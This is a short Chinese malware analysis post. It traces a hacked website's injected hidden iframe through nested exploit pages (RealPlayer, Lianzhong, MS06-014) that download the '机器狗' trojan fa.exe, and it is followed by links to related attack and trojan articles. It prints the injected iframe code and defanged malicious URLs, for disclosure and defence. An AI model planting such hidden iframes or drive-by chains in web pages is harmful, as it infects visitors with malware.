一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站

简介: 一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站

一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。

检查该网站的网代码,发现:

/---
<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></iframe>
---/

1 hxxp://xxx.hu*i**la**ib*a*.info/104.htm

包含代码:

/---
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/real.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/lz.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/614.htm"></iframe>
---/

1.1 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/real.htm

利用realplayer漏洞下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe


相关文章
|
2月前
|
安全 网络协议 Linux
结合 `nc` 工具利用笑脸漏洞(Smile Bug)攻击 Metasploitable2 Linux
本文介绍如何使用 `nc`(Netcat)工具结合笑脸漏洞(Smiley Bug)攻击 Metasploitable2 Linux 靶机。首先概述了 `nc` 的基本功能和高级用法,包括建立连接、监听端口、文件传输等操作。接着详细描述了笑脸漏洞的原理及其在网络攻防中的应用,展示了通过 `nc` 发送恶意输入检测漏洞的方法。最后结合 Python 脚本实现更复杂的攻击场景,并强调了合法性和环境隔离的重要性。
55 13
|
6月前
|
安全
绕过IceSword文件检测的Trojan.Win32.Mnless.zpc/ojj6erv.sys
绕过IceSword文件检测的Trojan.Win32.Mnless.zpc/ojj6erv.sys
|
6月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
|
6月前
|
安全 网络协议 JavaScript
ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等
ARP病毒自动添加的网址利用ms07004EXP和MS0614EXP传播Worm.Win32.Delf.cc等
|
6月前
|
安全 网络协议
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
|
6月前
|
移动开发 监控 安全
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
03-31/某博客网的rss2.asp力推5病毒(其中3个为灰鸽子)第3版
|
6月前
|
安全 Shell
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
|
10月前
|
安全 网络安全 数据库
LabVIEW NI网络设备在MAX中不显示或未识别
LabVIEW NI网络设备在MAX中不显示或未识别
350 4
|
移动开发 安全 Windows
Win7和Mac及HTML5将成黑客2011年攻击重点
据国外媒体报道,根据安全供应商Panda安全的调查显示,随着黑客主义(hactivism)和国家攻击行为的继续发展,2011年以Windows 7,Mac和HTML5为目标的攻击可能让信息安全专业人士手忙脚乱。
762 0